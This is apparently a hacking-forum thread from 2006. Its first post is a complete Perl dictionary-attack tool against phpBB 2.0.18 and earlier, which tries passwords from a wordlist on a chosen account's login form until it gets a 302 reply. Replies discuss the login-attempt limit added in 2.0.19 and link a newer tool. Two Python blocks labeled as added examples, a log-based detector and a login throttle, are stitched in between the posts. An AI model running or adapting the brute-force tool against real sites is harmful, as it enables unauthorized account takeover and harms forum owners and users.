phpBB forums <= 2.0.18 Remote Dictionary Attack Tool

Discussion in 'CMS/forum vulnerabilities' started by D1mOn, 26 Jan 2006.

  1. D1mOn

    D1mOn Elder

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Code:
    #!/usr/bin/perl
    ############################################
    # Credits:            Weakness and Xploit by DarkFig
    # Affected products:  All PhpBB versions <= 2.0.18
    # Type:               Dictionary attack
    # Solutions:          None official, but many solutions are possible ;)
    # Note:               If a line of the dictionary file contains no data => "End of the password file"
    # Ps:                 Public after 1 week lol
    # Demo:               http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
    # Team:               Hackademie [] Acid_Root []  BoD []
    # PS:                 Volcom, happy birthday; ok, I'm late... here's your present ^^
    ############################################
    use IO::Socket;
    
    #--------------Usage--------------#
    if(@ARGV != 6){
    print "
    +---------------------------------------------------------------------------------+
    +------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
    +---------------------------------------------------------------------------------+
    + Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile>    +
    +---------------------------------------------------------------------------------+
    + <host>        => The host where PhpBB is installed        |   [Ex: site.com]    +
    + <path>        => Path of the PhpBB board                  |   [Ex: /forum/]     +
    + <port>        => PhpBB board port                         |   [Default is 80]   +
    + <pass_file>   => File containing words (dictionnary file) |   [Ex: dico.txt]    +
    + <username>    => Username you want to bruteforce          |   [Ex: MasterLamer] +
    + <file_result> => File you want to log activity            |   [Ex: results.txt] +
    +---------------------------------------------------------------------------------+
    ";exit();}
    
    #--------------Data--------------#
    $host       = $ARGV[0];
    $path       = $ARGV[1];
    $full       = "$host"."$path";
    $port       = $ARGV[2];
    $pass_file  = $ARGV[3];
    $username   = $ARGV[4];
    $fileresult = $ARGV[5];
    $OK         = 0;
    $referer    = "http://"."$host"."$path"."login.php?redirect=";
    $postit     = "$path"."login.php";
    
    #--------------Hello world-----------------#
    print "
    +---------------------------------------------------------+
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
    +---------------------------------------------------------+
           [+] Username             | $username
           [+] Dictionnary file     | $pass_file
           [+] Attack log           | $fileresult
    +---------------------------------------------------------+";
    
    #--------------Password file--------------#
    # "or" binds looser than "||": with "||" the die would never fire on a failed open
    open(FILE, "<$pass_file") or die("\n[-] Can't open the file...\n");
    chomp(@passdico = <FILE>);
    $nligne = "0";
    while ($OK ne 1) {
    $passwordz  = "$passdico[$nligne]";
    $request    = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
    $length     = length $request;
    if ($passwordz eq ""){print "\n       [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
    
    #--------------Sending data--------------#
    $send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
    print $send "POST $postit HTTP/1.1\n";
    print $send "Host: $host\n";
    print $send "Content-Type: application/x-www-form-urlencoded\n";
    print $send "Content-Length: $length\n\n";
    print $send "$request\n";
    read $send, $answer, 15;
    close($send);
    
    #-------------Success---------------#
    if ($answer =~ /HTTP\/(.*?) 302/) {
    $OK = 1;
    print "
           [-] Trying the password "."$passwordz
           [+] User:     $username
           [+] Password: $passwordz
    +---------------------------------------------------------+\n";
    open results, ">$fileresult";
    print results "
    +---------------------------------------------------------+
    + PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
    +---------------------------------------------------------+
        [+] PhpBB board               | $full
       [+] Board's port              | $port
       [+] Username                  | $username
       [+] Dictionnary file          | $pass_file
        [+] Number of test            | $nligne
        [+] Password found            | $passwordz
    +---------------------------------------------------------+\n";
    close(FILE);close(results);exit();}
    
    #-------------Failed-----------------#
    if ($OK == 0) {print "\n       [-] Trying the password "."$passwordz";$nligne++;}} 
     
    2 people like this.
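From the defender's side, the script above leaves a recognisable trace in the web server log: a burst of POSTs to login.php from one address, no User-Agent header (the script sends none), and, on the tool's own success criterion, a 302 after a run of failures. The following detection logic is an added example and not part of the thread; it assumes Apache combined log format, constructed sample lines, and that a failed phpBB login re-renders the form with status 200.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format lines (not real traffic). The script on this
# page POSTs to login.php, sends no User-Agent, and treats a 302 as success.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jan/2006:10:00:01 +0000] "POST /forum/login.php HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [26/Jan/2006:10:00:02 +0000] "POST /forum/login.php HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [26/Jan/2006:10:00:02 +0000] "POST /forum/login.php HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [26/Jan/2006:10:00:03 +0000] "POST /forum/login.php HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [26/Jan/2006:10:00:04 +0000] "POST /forum/login.php HTTP/1.1" 302 0 "-" "-"
198.51.100.9 - - [26/Jan/2006:10:00:05 +0000] "POST /forum/login.php HTTP/1.1" 302 0 "http://site.example/forum/login.php" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return d

def find_dictionary_attacks(log_text, threshold=4, window=timedelta(seconds=60)):
    """Return {ip: details} for sources that POST to login.php at least `threshold`
    times within `window`; flags a 302 after failures and the missing User-Agent."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse(line)
        if ev and ev["method"] == "POST" and ev["path"].endswith("/login.php"):
            per_ip[ev["ip"]].append(ev)
    alerts = {}
    for ip, events in per_ip.items():
        events.sort(key=lambda e: e["ts"])
        for i in range(len(events)):
            burst = [e for e in events[i:] if e["ts"] - events[i]["ts"] <= window]
            if len(burst) >= threshold:
                failures = sum(1 for e in burst if e["status"] == "200")
                alerts[ip] = {
                    "attempts": len(burst),
                    "failures_then_success": failures > 0 and burst[-1]["status"] == "302",
                    "no_user_agent": all(e["ua"] == "-" for e in burst),
                }
                break
    return alerts
```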
  2. syntacsis

    syntacsis Elder

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    This is an old exploit by now. http://forum.antichat.ru/thread11983.html
    It was precisely because of it, by the way, that the number of login attempts was limited in version 2.0.19. And the limit was implemented in a rather amusing way. If you make several attempts to log into the forum under the admin's username and exceed the allowed number of attempts while the admin is online at that moment, he simply gets kicked off the forum. For the period he himself set in the admin panel. :)
     
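The side effect syntacsis describes comes from counting failures against the account alone, so anyone who exceeds the limit on "admin" takes the real admin offline. An added example, not phpBB's code, of the alternative design: failures are keyed on (client address, username), the block applies only to that client, and existing sessions are never touched. Names, thresholds and the scenario addresses are constructed.

```python
import time
from collections import defaultdict

class LoginThrottle:
    """Failed-login throttle keyed on (client_ip, username): too many failures
    block that client against that account for lockout_seconds, but never touch
    the account's live sessions or other clients, so the real admin stays online."""

    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.time):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock                  # injectable so the scenario below runs offline
        self.failures = defaultdict(int)    # (ip, user) -> consecutive failures
        self.blocked_until = {}             # (ip, user) -> unix time the block lifts

    def is_blocked(self, ip, user):
        until = self.blocked_until.get((ip, user))
        if until is None:
            return False
        if self.clock() >= until:           # lockout expired: forget the history
            del self.blocked_until[(ip, user)]
            self.failures[(ip, user)] = 0
            return False
        return True

    def record(self, ip, user, success):
        """Call after each password check; returns True if this client is now blocked."""
        key = (ip, user)
        if success:                         # a good password clears the counter
            self.failures.pop(key, None)
            self.blocked_until.pop(key, None)
            return False
        self.failures[key] += 1
        if self.failures[key] >= self.max_failures:
            self.blocked_until[key] = self.clock() + self.lockout_seconds
            return True
        return False

def simulate():
    """Constructed scenario: 203.0.113.7 hammers 'admin' while the real admin
    logs in from 198.51.100.9. Returns (attacker blocked, admin blocked, attacker after expiry)."""
    now = [1000.0]
    t = LoginThrottle(max_failures=5, lockout_seconds=60, clock=lambda: now[0])
    for _ in range(5):
        t.record("203.0.113.7", "admin", success=False)
    attacker_blocked = t.is_blocked("203.0.113.7", "admin")
    admin_blocked = t.is_blocked("198.51.100.9", "admin")
    now[0] += 61                            # clock past the lockout window
    attacker_after_expiry = t.is_blocked("203.0.113.7", "admin")
    return attacker_blocked, admin_blocked, attacker_after_expiry
```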
  3. D1mOn

    D1mOn Elder

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Well, dunno, I saw it on http://h4cky0u.org, so don't blame me for it being old)))
     
  4. syntacsis

    syntacsis Elder

    Joined:
    14 Nov 2005
    Messages:
    78
    Likes Received:
    31
    Reputations:
    6
    Yeah, it's all fine! It wasn't on the Russian Antichat.
    And here one has already been written for 2.0.19:
    http://forum.antichat.ru/thread13510.html
     
    1 person likes this.
  5. sergio_nikol

    sergio_nikol New Member

    Joined:
    15 Oct 2005
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Where do I get the libraries, or can the line
    + <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
    simply be left out (meaning, just use any txt file)?
     
  6. Azazel

    Azazel Head of everything

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154